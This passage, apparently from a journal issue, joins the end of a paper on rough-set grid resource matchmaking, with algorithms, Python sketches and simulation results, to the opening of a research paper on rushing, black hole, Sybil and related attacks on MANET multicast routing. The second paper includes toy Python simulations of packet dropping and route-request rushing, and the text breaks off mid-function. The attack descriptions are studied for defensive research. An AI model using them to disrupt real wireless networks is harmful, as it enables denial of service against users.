  For all x ∈ ~X
    If ρ⁺_(X,T)(x) ≥ d⁺_T(X)
      Add x to I.
  End for.
  For all x ∈ X
    If ρ⁻_(X,T′)(x) ≥ d⁻_T′(X)
      Add x to C.
  End for.
Step 3:
  X* = (X − C) ∪ I.
Step 4:
  Compute X̲* according to R.
  Return X̲*.
Figure 4. Candidates Optimization algorithm
Step 1 calculates d⁺_T(X) and d⁻_T′(X) using equations (16) and (17), respectively. In Step 2, the inflated dynamic main set of X and the contracted dynamic main set of X are computed using equations (7) and (10), respectively.

Step 3 calculates the two-direction dynamic set of X according to T and T′ using equation (13). The candidate set X can be expanded according to the property set T, which contains the properties with higher priority, and can be contracted according to the property set T′, the properties of which have lower priority. In Step 4, by using equation (14), the lower approximation set
X̲* of X* is calculated according to the requested resource property set R. In fact, X̲* is the set of resources that are most likely to be selected as the matched resources.
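The four steps of Fig. 4 can be sketched end to end on toy data; the resources, equivalence classes, and thresholds below are our own assumptions, with indiscernibility supplied as precomputed class dicts:

```python
# End-to-end sketch of the Candidates Optimization steps (Fig. 4) on
# invented data: resources are ids, and the dicts eq_T, eq_Tp, eq_R give
# the equivalence class of each resource under T, T', and R respectively.

def optimize(U, X, eq_T, eq_Tp, eq_R, d_in, d_out):
    # Step 2: inflate by T (eq. 7) and contract by T' (eq. 10).
    I = {x for x in U - X
         if d_in <= 1 - len(eq_T[x] - X) / len(eq_T[x]) < 1}
    C = {x for x in X
         if d_out <= len(eq_Tp[x] - X) / len(eq_Tp[x]) < 1}
    # Step 3: two-direction dynamic set (eq. 13).
    X_star = (X - C) | I
    # Step 4: the R-lower approximation of X* (eq. 14) is the final set.
    return {x for x in U if eq_R[x] <= X_star}

U = {1, 2, 3, 4, 5}
X = {1, 2}
eq_T = {1: {1}, 2: {2, 3}, 3: {2, 3}, 4: {4, 5}, 5: {4, 5}}
eq_Tp = {1: {1}, 2: {2, 4}, 3: {3}, 4: {2, 4}, 5: {5}}
eq_R = {1: {1}, 2: {2}, 3: {3}, 4: {4, 5}, 5: {4, 5}}
candidates = optimize(U, X, eq_T, eq_Tp, eq_R, d_in=0.5, d_out=0.5)
# Resource 3 is pulled into the candidate set and 2 is dropped,
# so candidates == {1, 3}.
```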
B. Resource Matchmaking
After the optimization of the candidate set, we only need to apply the matchmaking algorithm to the optimized candidate set. The reduction of the candidate set reduces the searching time.

We design the resource matching algorithm according to the rules proposed in [14] and with regard to the ontology template.
We define m(q_j, r_i) as the match degree of the requested resource property r_i and the advertised resource property q_j. In this algorithm, properties are divided into two classes. The first class is the properties with string type. For this class of properties, if q_j is an exact match with r_i, the match degree is 1.0. But if q_j is a plug-in match with r_i with a match generation of d:

m(q_j, r_i) = 1 − (d − 1) × 0.1,  if 2 ≤ d ≤ 5
m(q_j, r_i) = 0.5,  if d > 5

For the case of the subsume match, if q_j is a subsume match with r_i with a match generation of d:

m(q_j, r_i) = 0.8 − (d − 1) × 0.1,  if 1 ≤ d ≤ 3
m(q_j, r_i) = 0.5,  if d > 3

An advertised property with an empty value is regarded as a null property. For any null property q_j the match degree is 0.5.

The second class is the property set with non-string type. This class contains properties of type integer, long integer, and double. For this class, if the types of both properties are equal, the match degree is defined by:

m(q_j, r_i) = 1 − ( V(q_j) / V(r_i) ) × 0.1,  if V(q_j) / V(r_i) ≤ 5
m(q_j, r_i) = 0.5,  if V(q_j) / V(r_i) > 5

in which V(q_j) is the value of attribute q_j.
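A sketch of these per-property rules follows. How the relation and the generation distance d are obtained from the ontology is left to the caller, and the function name is our own:

```python
# Hedged sketch of the per-property match degree rules of Section V-B.
# The relation between a requested and an advertised property ('exact',
# 'plugin', 'subsume', 'numeric', or 'null') and the generation distance d
# are assumed to come from the ontology template; we take them as inputs.

def match_degree(relation, d=0, value_ratio=None):
    """Return m(q_j, r_i) for one advertised/requested property pair."""
    if relation == "exact":
        return 1.0
    if relation == "plugin":                  # pA subsumes pR
        return 1 - (d - 1) * 0.1 if 2 <= d <= 5 else 0.5
    if relation == "subsume":                 # pR subsumes pA
        return 0.8 - (d - 1) * 0.1 if 1 <= d <= 3 else 0.5
    if relation == "numeric":                 # same non-string type
        return 1 - value_ratio * 0.1 if value_ratio <= 5 else 0.5
    return 0.5                                # null / empty property
```

For example, a plug-in match two generations away (d = 3) yields approximately 0.8, and any relation degrades to the null score 0.5 once the generation distance exceeds its bound.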
Fig. 5 shows the conditions for calculating the match degree.
For calculating the match between the requested resource and the advertised resource we have used equation (18), which takes, for each requested property, the maximum match degree over the advertised properties:

M(R_R, R_A) = ( Σ_{i=1}^{L} MAX_{j=1,…,K}( m(q_j, r_i) ) × w_i ) / Σ_{i=1}^{L} w_i    (18)

In formula (18), the symbols R_R and R_A are the requested resource and the advertised resource, respectively.
According to this algorithm, matched resources can be ranked according to their match degree. The ranking process is done according to the priority of the properties.
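The weighted aggregation of equation (18) can be sketched as follows; the property names, weights, and degree table are hypothetical:

```python
# Sketch of the aggregate match of equation (18): for each requested
# property take the best per-property degree over the advertised
# properties, then compute the weight-normalized sum. All inputs invented.

def resource_match(requested, advertised, degree):
    """requested: {r_i: w_i}; advertised: list of q_j; degree(q, r) -> m."""
    total = sum(requested.values())
    best = sum(max(degree(q, r) for q in advertised) * w
               for r, w in requested.items())
    return best / total

# Hypothetical degree table between advertised and requested properties.
table = {("q1", "cpu"): 1.0, ("q2", "cpu"): 0.5,
         ("q1", "ram"): 0.5, ("q2", "ram"): 0.7}
score = resource_match({"cpu": 0.9, "ram": 0.3}, ["q1", "q2"],
                       lambda q, r: table[(q, r)])
# best for cpu = 1.0, for ram = 0.7, so the score is
# (1.0*0.9 + 0.7*0.3) / 1.2, approximately 0.925.
```

Ranking the advertised resources then amounts to sorting them by this score, so the heavily weighted properties dominate the order.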
For each q_j ∈ Q with V(q_j) ≠ null
  For each r_i ∈ R
    If the type of both q_j and r_i is string
      If q_j is an exact match with r_i
        m(q_j, r_i) = 1.0.
      Else if q_j is a plug-in match with r_i with match generation d
        If 2 ≤ d ≤ 5
          m(q_j, r_i) = 1 − (d − 1) × 0.1.
        Else if d > 5
          m(q_j, r_i) = 0.5.
      Else if q_j is a subsume match with r_i
        If q_j is a subclass of r_i with depth d
          If 1 ≤ d ≤ 3
            m(q_j, r_i) = 0.8 − (d − 1) × 0.1.
          Else if d > 3
            m(q_j, r_i) = 0.5.
    Else if the type of both q_j and r_i is not string and is equal
      If V(q_j) / V(r_i) ≤ 5
        m(q_j, r_i) = 1 − ( V(q_j) / V(r_i) ) × 0.1.
      Else
        m(q_j, r_i) = 0.5.
  End for
End for
For each q_j ∈ Q with V(q_j) = null
  For each r_i ∈ R
    m(q_j, r_i) = 0.5.
  End for
End for
Figure 5. Match degree algorithm
VI. EXPERIMENTAL RESULTS
In order to simulate the algorithm we run GridSim, which is a Java-based grid simulator. We have also used the db4o database [22] as a repository for the advertised resources. We have created an ontology of the possible resources using the protégé API [10], which is a Java-based API, for the semantic description of the resources. The structure of the resource ontology is motivated by the need to provide information about resources. The resource ontology proposed in this paper takes most computing resources into account. This ontology template has been created on the basis of the Karlsruhe ontology model [23].
In order to test our algorithm we simulated 10000 resources which are semantically defined according to the ontology template shown in Fig. 3. Each resource registers itself in the database as soon as it joins the grid, by sending its features, which are defined according to the ontology template. For the query generator we created users which send resource requests with different requested resource properties. The requested resource properties are defined according to the ontology template.
As shown in Fig. 6, the user sends its resource request to the GridSim broker. The broker forwards this resource request to the Grid Information Service (GIS). The GIS uses the ontology and accesses the database in order to find the advertised resources relevant to the requested resource. The IDs of the retrieved resources, along with their match degrees, are sent back to the user.
Figure 6. GridSim Architecture
We have tested our algorithm with resource property certainty of 30%, 50%, 80%, and 100%, and for each of these states we have run the simulator with different numbers of advertised resources. For comparison we have used the average results of 100 runs of each case.
For evaluating the precision and the matching time of our algorithm, we compared it with the algorithm proposed in [14], which is a combination of UDDI and OWL-S, and with the rough set based algorithm proposed in our previous work [18].
A. Precision evaluation
As mentioned above, we test our algorithm with 4 groups of advertised resources: the first group has only 30% property certainty, the second group 50%, the third group 80%, and the fourth group 100%. Fig. 7 to Fig. 13 show the comparison of the precision for different numbers of resources. Precision is defined as the ratio of the number of correctly retrieved resources to all the retrieved resources. As follows from the matching algorithm proposed in [14], the UDDI and OWL-S matching algorithm cannot deal with uncertainty.
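The precision metric used in these figures can be stated in a few lines; the resource IDs below are invented:

```python
# Precision as defined above: correctly retrieved / all retrieved.
# The two sets are made up to illustrate the metric.

def precision(retrieved, relevant):
    return len(retrieved & relevant) / len(retrieved) if retrieved else 0.0

retrieved = {"r1", "r2", "r3", "r4"}
relevant = {"r1", "r2", "r5"}
# 2 of the 4 retrieved resources are correct, so precision is 0.5.
```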
Figure 7. Comparison of precision for 500 resources (chart: precision vs. properties certainty rate, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Figure 8. Comparison of precision for 1000 resources (chart: precision vs. properties certainty rate, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Figure 9. Comparison of precision for 2000 resources (chart: precision vs. properties certainty rate, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Figure 10. Comparison of precision for 4000 resources (chart: precision vs. properties certainty rate, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Figure 11. Comparison of precision for 6000 resources (chart: precision vs. properties certainty rate, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Figure 12. Comparison of precision for 8000 resources (chart: precision vs. properties certainty rate, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Figure 13. Comparison of precision for 10000 resources (chart: precision vs. properties certainty rate, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
As shown in the above figures, the precision of the combination of UDDI and OWL-S is lower than that of the Dynamic Rough Set Resource Discovery (DRSRD) algorithm for 30%, 50%, and 80% service property certainty. This is because of the inability of UDDI and OWL-S to deal with uncertainty. Also, the precision of DRSRD is higher than that of the rough set based algorithm. This is because of the dynamic features of the Grid environment: since classical rough set theory cannot deal with dynamic features, the rough set based algorithm has lower precision. As the certainty increases, the difference between the UDDI and OWL-S combined algorithm and the DRSRD algorithm decreases, so that at 100% certainty the precision of both algorithms reaches 100%. But for the other rates of certainty, DRSRD is more precise than the rough set based algorithm. It is clear that DRSRD deals well with vagueness and with the dynamic features of the grid.
Figure 14. Precision increment for 30% certainty rate (chart: precision vs. number of resources, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Figure 15. Precision increment for 50% certainty rate (chart: precision vs. number of resources, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Figure 16. Precision increment for 80% certainty rate (chart: precision vs. number of resources, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Figure 17. Precision increment for 100% certainty rate (chart: precision vs. number of resources, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Fig. 14 to Fig. 17 show the increase of the precision with the number of resources for the 30%, 50%, 80%, and 100% certainty rates, respectively. Along with the increase in the number of resources, the precision also increases, because of the growth of the survey population.
B. Matching time evaluation
For evaluating the matching time we ran our simulator 100 times with different numbers of advertised resources. We compared the DRSRD algorithm with the rough set based algorithm and with the UDDI and OWL-S combined model.
Figure 18. Comparison of the matching time (chart: matching time in ms vs. number of resources, for the rough set based algorithm, UDDI and OWL-S, and DRSRD)
Fig. 18 shows that the matching time of the DRSRD algorithm is lower than that of UDDI and OWL-S when the number of advertised resources is under 9000. As the number of advertised resources increases, the UDDI and OWL-S combined model becomes more effective, because its matching time depends on the number of properties rather than on the number of advertised resources. It is also clear that DRSRD has a lower matching time than the rough set based algorithm.
VII. CONCLUSION AND FUTURE WORK
In this paper we have shown that a dynamic rough set based algorithm deals well with uncertainty and vagueness for resource matching in a dynamic environment such as the grid. Using classical rough set theory to deal with vagueness is effective, but only for static data. Since the grid is a dynamic environment and the features of resources change dynamically, we need a dynamic method to deal with vagueness, so we have used dynamic rough set theory. The DRSRD algorithm can deal with uncertain properties and find a set of resources which may maximally satisfy the requested resource. In fact, our algorithm finds a list of resources which have a high degree of matching according to the weights of the requested properties. Experimental results have shown that the DRSRD algorithm is more effective in resource matching than the rough set based algorithm and the UDDI and OWL-S combined algorithm. The matching time of our algorithm is lower than that of the rough set based algorithm; it is also lower than that of the UDDI and OWL-S algorithm for fewer than 9000 resources.
REFERENCES
[1] M. Li and M. A. Baker, The Grid Core Technologies, Wiley, 2005.
[2] Open Grid Services Architecture (OGSA), http://www.globus.org/ogsa.
[3] Global Grid Forum (GGF), http://www.ggf.org
[4] Dong Ya Li and Bao Qing Hu, "A Kind of Dynamic Rough Sets," Fourth International Conference on Fuzzy Systems and Knowledge Discovery (FSKD 2007), Vol. 3, pp. 79-85, 2007.
[5] Keqiu Li, Deqin Yan, and Wenyu Qu, "Modifications to Bayesian Rough Set Model and Rough Vague Sets," The 2nd IEEE Asia-Pacific Service Computing Conference (APSCC 2007), pp. 544-549, 2007.
[6] Tian Qiu, Lei Li, and Pin Lin, "Web Service Discovery with UDDI Based on Semantic Similarity of Service Properties," Third International Conference on Semantics, Knowledge and Grid (SKG 2007), pp. 454-457, 2007.
[7] Yue Kou, Ge Yu, Derong Shen, Dong Li, and Tiezheng Nie, "PS-GIS: Personalized and Semantics-Based Grid Information Services," Infoscale 2007.
[8] M. Burstein and O. Lassila, "DAML-S: Semantic Markup for Web Services," in Proc. of the International Semantic Web Workshop, 2001.
[9] D. Martin, M. Burstein, J. Hobbs, O. Lassila, D. McDermott, S. McIlraith, S. Narayanan, M. Paolucci, B. Parsia, T. Payne, E. Sirin, N. Srinivasan, and K. Sycara, "OWL-S: Semantic Markup for Web Services," http://www.w3.org/Submission/2004/SUBM-OWL-S 20041122/, 2004.
[10] Protégé, http://protege.stanford.edu/plugins/owl/.
[11] S. Bechhofer, F. van Harmelen, J. Hendler, I. Horrocks, D. McGuinness, P. F. Patel-Schneider, and L. A. Stein, OWL Web Ontology Language Reference, W3C Recommendation, Feb. 2004.
[12] S. Miles, J. Papay, V. Dialani, M. Luck, K. Decker, T. Payne, and L. Moreau, "Personalised Grid Service Discovery," IEE Proceedings Software: Special Issue on Performance Engineering, 150(4):252-256, August 2003.
[13] J. Komorowski, Z. Pawlak, L. Polkowski, and A. Skowron, "Rough Sets: A Tutorial," Rough Fuzzy Hybridization, Springer, pp. 3-98, 1999.
[14] M. Paolucci, T. Kawamura, T. Payne, and K. Sycara, "Semantic Matching of Web Service Capabilities," Proceedings of the 1st International Semantic Web Conference (ISWC 2002), Berlin, 2002.
[15] T. Chen, X. Zhou, and N. Xiao, "A Semantic-based Grid Service Discovery and Composition," Third International Conference on Semantics, Knowledge and Grid, pp. 527-530, Oct. 2007.
[16] Qi Yong, Qi Saiyu, Zhu Pu, and Shen Linfeng, "Context-Aware Semantic Web Service Discovery," Third International Conference on Semantics, Knowledge and Grid (SKG 2007), pp. 499-502, 2007.
[17] J. Hau, W. Lee, and J. Darlington, "A Semantic Similarity Measure for Semantic Web Services," in Web Service Semantics Workshop 2005, Japan.
[18] I. Ataollahi and M. Analoui, "Resource Discovery Using Rough Set in Grid Environment," 14th International CSI Conference (CSICC 2009), July 1-2, 2009, Tehran, Iran (in press).
[19] E. Xu, Shaocheng Tong, Liangshan Shao, and Baiqing Ye, "Rough Set Approach for Processing Information Table," in Proceedings of SNPD (3), 2007, pp. 239-243.
[20] Dong Ya Li and Bao Qing Hu, "A Kind of Dynamic Rough Sets," Proceedings of the Fourth International Conference on Fuzzy Systems and Knowledge Discovery (FSKD 2007), Vol. 3, pp. 79-85, August 24-27, 2007.
[21] www.annauniv.edu/care/downloads/SemanticGrid/Presentation/Basic_Presentation-cdac_1.ppt
[22] http://www.db4o.com/about/productinformation/resources/db4o-4.5-tutorial-java.pdf
[23] http://www.aifb.uni-karlsruhe.de/WBS/sst/Research/Publications/KI-Heft-KAON-Survey-2003.pdf
Impact of Rushing attack on Multicast in
Mobile Ad Hoc Network
V. PALANISAMY¹, P. ANNADURAI²
¹ Reader and Head (i/c), Department of Computer Science & Engineering, Alagappa University, Karaikudi, Tamilnadu, India. Email: vpazhanisamy@yahoo.co.in
² Lecturer in Computer Science, Kanchi Mamunivar Centre for Post Graduate Studies (Autonomous), Lawspet, Puducherry, India. Email: annadurai_aps70@yahoo.co.in
Abstract — A mobile ad hoc network (MANET) is a self-organizing system of mobile nodes that communicate with each other via wireless links with no fixed infrastructure or centralized administration such as base stations or access points. Nodes in a MANET operate both as hosts and as routers to forward packets for each other in a multi-hop fashion. For many applications in wireless networks, multicasting is an important and frequent communication service: a single message can be delivered to multiple receivers simultaneously, which greatly reduces the transmission cost of sending the same packet to multiple recipients.

The security issue of MANETs in group communications is even more challenging because of the involvement of multiple senders and multiple receivers. During multicasting, mobile ad hoc networks are exposed to attacks by malicious nodes because of vulnerabilities of the routing protocols. Some of these attacks are the rushing attack, blackhole attack, Sybil attack, neighbor attack, and jellyfish attack. This paper is based on the rushing attack. In a rushing attack, the attacker exploits the duplicate suppression mechanism by quickly forwarding route discovery packets in order to gain access to the forwarding group, and this affects the Average Attack Success Rate.

In this paper, the goal is to measure the impact of the rushing attack, and of the attacker node positions, on the performance metric of Average Attack Success Rate with respect to three scenarios: near the sender, near the receiver, and anywhere within the network. The Attack Success Rate in these three scenarios is also compared.

Index Terms — Multicast, Rushing attack, MANETs, Security, attack strategies, security threats, attacks on multicast.
I. INTRODUCTION
A mobile ad hoc network is a self-organizing system of mobile nodes that communicate with each other via wireless links with no infrastructure or centralized administration such as base stations or access points. Nodes in a MANET operate both as hosts and as routers to forward packets for each other in a multi-hop fashion. MANETs are suitable for applications in which no infrastructure exists, such as military battlefields, emergency rescue, vehicular communications, and mining. In these applications, communication and collaboration among a given group of nodes are necessary. Instead of using multiple unicast transmissions, it is advantageous to use multicast in order to save network bandwidth and resources, since a single message can be delivered to multiple receivers simultaneously. Existing multicast routing protocols in MANETs can be classified into two categories: tree-based and mesh-based. In a multicast routing tree there is usually only a single path between a sender and a receiver, while in a routing mesh there may be multiple paths between each sender-receiver pair. Routing meshes are thus more suitable than routing trees for systems with frequently changing topology, such as MANETs, due to the availability of multiple paths between a source and a destination. Example tree-based multicast routing protocols are MAODV, AMRIS, BEMRP, and ADMR. Typical mesh-based multicast routing protocols are ODMRP, FGMP, CAMP, DCMP, and NSMP [2].

Among all the research issues, security is an essential requirement in MANET environments. Compared to wired networks, MANETs are more vulnerable to security attacks due to the lack of a trusted centralized authority, the lack of trust relationships between mobile nodes, easy eavesdropping because of the shared wireless medium, dynamic network topology, low bandwidth, and the battery and memory constraints of mobile devices. The security issue of MANETs in group communications is even more challenging because of the involvement of multiple senders and multiple receivers. Although several types of security attacks in MANETs have been studied in the literature, the focus of earlier research is on unicast (point-to-point) applications. The impacts of security attacks on multicast in MANETs have not yet been explored [3].

In this paper, we present a simulation-based study of the effects of the rushing attack on multicast in MANETs. We consider the most common types of attacks, namely the rushing attack, blackhole attack, neighbor attack, and jellyfish attack.
A. Goal
The goal of this paper is to study the impact of the rushing attack on mesh-based multicast in MANETs. The rushing attack acts as an effective denial-of-service attack against all currently proposed on-demand ad hoc network routing protocols, including protocols that were designed to be secure [2].

In this work, we simulate three scenarios: the attacker node is placed near the sender, the attacker node is placed near the receiver, and the attacker node is placed anywhere within the MANET. Based on these scenarios, we simulate how the rushing attack affects the network performance.
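The duplicate suppression behaviour that the rushing attack exploits can be illustrated with a minimal sketch. The topology, node names, and delays are invented, and the model is deliberately simplified: each node forwards only the first copy of a route request it hears.

```python
# Minimal sketch (invented topology): each node forwards only the FIRST
# copy of a route request it hears (duplicate suppression). A "rushing"
# node that forwards with near-zero delay therefore captures the route.
import heapq

def discover_route(links, delays, src, dst):
    """Return the path taken by the first request copy to reach dst."""
    queue = [(0.0, src, [src])]   # (arrival_time, node, path_so_far)
    seen = set()
    while queue:
        t, node, path = heapq.heappop(queue)
        if node in seen:
            continue              # duplicate suppression: ignore later copies
        seen.add(node)
        if node == dst:
            return path
        for nxt in links[node]:
            # delays[node] models the node's forwarding latency.
            heapq.heappush(queue, (t + delays[node], nxt, path + [nxt]))
    return None

# S can reach D via a well-behaved node N (delay 1.0) or an attacker A
# that rushes packets out almost immediately (delay 0.01).
links = {"S": ["N", "A"], "N": ["D"], "A": ["D"], "D": []}
delays = {"S": 0.0, "N": 1.0, "A": 0.01, "D": 0.0}
route = discover_route(links, delays, "S", "D")
# The attacker's copy reaches D first, so the discovered route goes
# through A: route == ["S", "A", "D"].
```

Once on the route, the attacker is part of the forwarding group and can drop or manipulate the multicast traffic, which is what the Attack Success Rate metric measures.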
B. Reading Roadmap
This paper starts with this section, which gives a brief introduction and the goal of the paper. Section 2 describes preliminaries on multicast attacks in MANETs. The improved model scheme, Impact of Rushing Attack on Multicast in Mobile Ad hoc Networks (IRAMA), is presented in Section 3. In Section 4, we discuss the experimental results. Finally, conclusions are given in Section 5.
II. MULTICAST AND ITS ATTACKS IN MOBILE AD HOC NETWORKS
A. Introduction
A mobile ad hoc network (MANET) is a self-organizing system of mobile nodes that communicate with each other via wireless links with no fixed infrastructure or centralized administration such as base stations or access points. Nodes in a MANET operate both as hosts and as routers, forwarding packets for each other in a multi-hop fashion. For many applications in wireless networks, multicasting is an important and frequent communication service: a single message can be delivered to multiple receivers simultaneously, which greatly reduces the transmission cost of sending the same packet to multiple recipients [4, 5].
Multicast is communication between a single sender and multiple receivers on a network; in other words, it transmits a single message to a select group of recipients. Multicast is used, for example, in streaming video, in which many megabytes of data are sent over the network. Single packets are copied by the network and sent to a specific subset of network addresses, which are specified in the destination address. It allows efficient point-to-multipoint distribution of packets and is frequently used in access-grid applications. Digital technology also made the option to multicast possible in broadcasting, allowing each digital broadcast station to split its bit stream into two, three, four or more individual channels of programming and/or data services.
Instead of using multiple unicast transmissions, it is advantageous to use multicast in order to save bandwidth and resources, since a single message can be delivered to multiple receivers simultaneously. Multicast data may still be delivered to the destination on alternative paths even when a route breaks. The term typically refers to IP multicast, which is often employed for streaming media. At the data link layer, multicast describes one-to-many distribution such as Ethernet multicast addressing, Asynchronous Transfer Mode (ATM) point-to-multipoint virtual circuits, or InfiniBand multicast. Teleconferencing and videoconferencing also use multicasting, but require more robust protocols and networks. Standards such as IP Multicast and the MBone are being developed to support multicasting over TCP/IP networks such as the Internet and will allow users to easily join multicast groups [6].
B. Attack against ad hoc network
While a wireless network is more versatile than a wired one, it is also more vulnerable to attacks. This is due to the very nature of radio transmissions, which are made over the air. On a wired network, an intruder would need to break into a machine of the network or to physically wiretap a cable. On a wireless network, an adversary is able to eavesdrop on all messages within the emission area by operating in promiscuous mode and using a packet sniffer (and possibly a directional antenna). Furthermore, due to the limitations of the medium, communications can easily be perturbed; the intruder can perform this attack by keeping the medium busy sending its own messages, or simply by jamming communications with noise [1].
Security has become a primary concern in providing protected communication between mobile nodes in a hostile environment. Unlike wireline networks, the unique characteristics of mobile ad hoc networks pose a number of non-trivial challenges to security design. Providing security support for mobile ad hoc networks is challenging for several reasons: (a) wireless networks are susceptible to attacks ranging from passive eavesdropping to active interfering and occasional break-ins by adversaries; (b) mobile users demand "anywhere, anytime" services; (c) a scalable solution is needed for a large-scale mobile network; (d) dynamic topology; (e) lack of infrastructure; (f) peer-to-peer network; (g) lack of centralized authority [17].
C. Attacks on Multicast
Multicast conserves network bandwidth by sending a single stream of data to multiple receivers; packets are duplicated only at branch points. The security issue of MANETs in group communications is even more challenging because of the involvement of multiple senders and multiple receivers. Some different types of multicast attacks are the rushing attack, blackhole attack, neighbor attack, jellyfish attack and Sybil attack, described below.
D. Rushing Attack
A rushing attacker exploits the duplicate suppression mechanism of on-demand routing protocols by quickly forwarding route discovery packets in order to gain access to the forwarding group [8].
Figure 1 Rushing Attack
Goal: to invade routing paths.
Target: multicast routing protocols that use a duplicate suppression mechanism in order to reduce routing overhead.
Method: the attacker quickly forwards route discovery (control) packets by skipping processing or routing steps; in other words, it sends malicious control messages and forwards packets faster than any legitimate node can.
E. Black Hole Attack
An attacker can drop received routing messages, instead of relaying them as the protocol requires, in order to reduce the quantity of routing information available to the other nodes.
This is called a black hole attack, and it is a "passive" and simple way to perform a denial of service. The attack can be carried out selectively (dropping routing packets for a specified destination, one packet every n packets, one packet every t seconds, or a randomly selected portion of the packets) or in bulk (dropping all packets), and may have the effect of making the destination node unreachable or of degrading communications in the network.
Message Tampering
An attacker can also modify the messages originating from other nodes before relaying them, if a mechanism for message integrity (e.g., a digest of the payload) is not utilized.
A packet drop attack or black hole attack is a type of denial-of-service attack accomplished by dropping packets. Black holes refer to places in the network where incoming traffic is silently discarded (or "dropped") without informing the source that the data did not reach its intended recipients [8, 9].
Figure 2 (a). Black Hole Attack (Drop all packets)
Goal: to damage the packet delivery ratio.
Target: all multicast protocols.
Method: the attacker first invades the forwarding group (e.g., by using a rushing attack), then drops some or all data packets instead of forwarding them.
Figure 2(b). Black Hole Attack (only a small amount of data is dropped)
Black hole attacks affect packet delivery and reduce the routing information available to the other nodes.
Effects:
- communication in the network is degraded;
- the destination node may become unreachable.
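The selective and bulk drop policies described above can be sketched as a toy relay routine in Python (the function name and policy labels are illustrative, not drawn from any protocol implementation):

```python
import random

def blackhole_forward(packets, drop_policy="all", n=3, p=0.5, rng=None):
    """Toy model of a black hole node: returns the packets it actually
    relays. Policies follow the text: drop everything ('all'), drop one
    packet every n packets ('every_n'), or drop a random portion p
    of the packets ('random')."""
    rng = rng or random.Random(0)
    relayed = []
    for idx, pkt in enumerate(packets, start=1):
        if drop_policy == "all":
            continue                      # bulk: silently discard everything
        if drop_policy == "every_n" and idx % n == 0:
            continue                      # drop one packet every n packets
        if drop_policy == "random" and rng.random() < p:
            continue                      # drop a random portion of packets
        relayed.append(pkt)
    return relayed
```

Because the source is never informed that a drop occurred, the receiver simply observes a lower packet delivery ratio, which is exactly the metric used in Section IV.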
F. Neighbor Attack
Upon receiving a packet, an intermediate node records its ID in the packet before forwarding it to the next node. An attacker, however, simply forwards the packet without recording its ID, making two nodes that are not within communication range of each other believe that they are neighbors (i.e., one hop away from each other), resulting in a disrupted route.
G. Jellyfish Attack
A jellyfish attacker first needs to intrude into the multicast forwarding group. It then delays data packets unnecessarily for some amount of time before forwarding them. This results in significantly higher end-to-end delay and thus degrades the performance of real-time applications.
Effect: increased end-to-end delay.
H. Sybil Attack
The Sybil attack manifests itself by allowing malicious parties to compromise the network by generating and controlling large numbers of shadow identities. Ideally, each radio represents a single individual; however, the broadcast nature of radio allows a single node to pretend to be many nodes simultaneously by using many different addresses while transmitting. The effect of the Sybil attack has been analyzed using the Packet Delivery Ratio (PDR) as the performance metric, with theory-based graphs simulated to study its influence on PDR [18].
A malicious user obtains multiple fake identities, pretends to be multiple distinct nodes in the system, and can thereby control the decisions of the system [8]. The Sybil attack can be categorized into two sub-categories: presentation of multiple identities simultaneously and presentation of multiple identities exclusively.
Identifiers exist at different levels, and an identifier only guarantees uniqueness at its intended level. The Sybil attack can therefore be perpetrated at the network layer or the application layer, where the respective identifiers are the IP address and the node ID. It can be manifested either by creating new identities or by duplicating other identities and disabling them after launching a DoS attack. The mechanism can be either localized or global, depending on the severity of the attack felt by neighboring nodes. The Sybil attack can defeat the objectives of distributed environments such as fair resource allocation, voting, routing mechanisms, distributed storage, and misbehavior detection.
III. IMPROVED MODEL (IMPACT OF RUSHING ATTACK ON MULTICAST IN MOBILE AD HOC NETWORKS)
A. Related Work
This work measures, through a simulation-based study, the effects of rushing attacks on multicast in MANETs. A rushing attacker first needs to invade the multicast forwarding group in order to capture data packets of the multicast session; it then quickly forwards the data packets to the next node on the routing path. This type of attack often results in a very low Average Attack Success Rate [15].
B. Rushing Attack and its Impacts in Ad hoc Networks
Multicast is communication between a single sender and multiple receivers on a network; in other words, it transmits a single message to a select group of recipients. On a wireless network, an adversary is able to eavesdrop on all messages within the emission area by operating in promiscuous mode and using a packet sniffer (and possibly a directional antenna). Furthermore, due to the limitations of the medium, communications can easily be perturbed. MANETs are more vulnerable to attacks than wired networks due to the open medium, dynamically changing network topology, cooperative algorithms, lack of centralized monitoring, and lack of a clear line of defense [10].
Typically, multicast on-demand routing protocols state that nodes must forward only the first received Route Request from each route discovery; all further received Route Requests are ignored. This is done in order to reduce routing overhead. The attack consists, for the adversary, in quickly forwarding its Route Request messages when a route discovery is initiated. If the Route Requests that first reach the target's neighbors are those of the attacker, then any discovered route includes the attacker. The rushing attack thus acts as an effective denial-of-service attack against all currently proposed on-demand ad hoc network routing protocols, including protocols that were designed to be secure [14]. In this work, we simulate three scenarios:
- the attacker node is placed near the sender;
- the attacker node is placed near the receiver;
- the attacker node is placed anywhere within the network.
Based on these scenarios, we simulate how the rushing attack affects the network performance.
C. Rushing Attack Formation
Figure 3 Rushing attack Formation
Algorithm for Rushing Attack Formation
Step 1: A set of N nodes is created.
Step 2: Connections between the nodes are created.
Step 3: The rushing node invades the forwarding multicast group.
Step 4: The sender sends packets to the particular groups.
Step 5: Meanwhile, the attacker node taps all the packets.
Step 6: The packets at the attacker node are quickly forwarded to the next upcoming node.
Step 7: The data packets from the legitimate node reach the destination late and are therefore dropped as duplicates.
Step 8: The rushing node in the multicast group thus affects the Average Attack Success Rate.
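Steps 1-8 can be sketched as a minimal, self-contained event model in Python (a toy with illustrative names, not the NS2 implementation used later in the paper): every node forwards only the first Route Request copy it hears, and the rushing node's near-zero forwarding delay lets its copy win the race, so legitimate copies arriving later are suppressed as duplicates.

```python
import heapq, itertools

def discover_route(graph, delay, source, dest):
    """Route Request flood with duplicate suppression (Steps 4-7):
    each node keeps only the FIRST copy it receives; later copies,
    including slower legitimate ones, are dropped as duplicates."""
    tie = itertools.count()              # breaks ties in the event queue
    pred, seen = {}, {source}
    events = [(delay[source], next(tie), n, source) for n in graph[source]]
    heapq.heapify(events)
    while events:
        t, _, node, sender = heapq.heappop(events)
        if node in seen:
            continue                     # duplicate: suppressed (Step 7)
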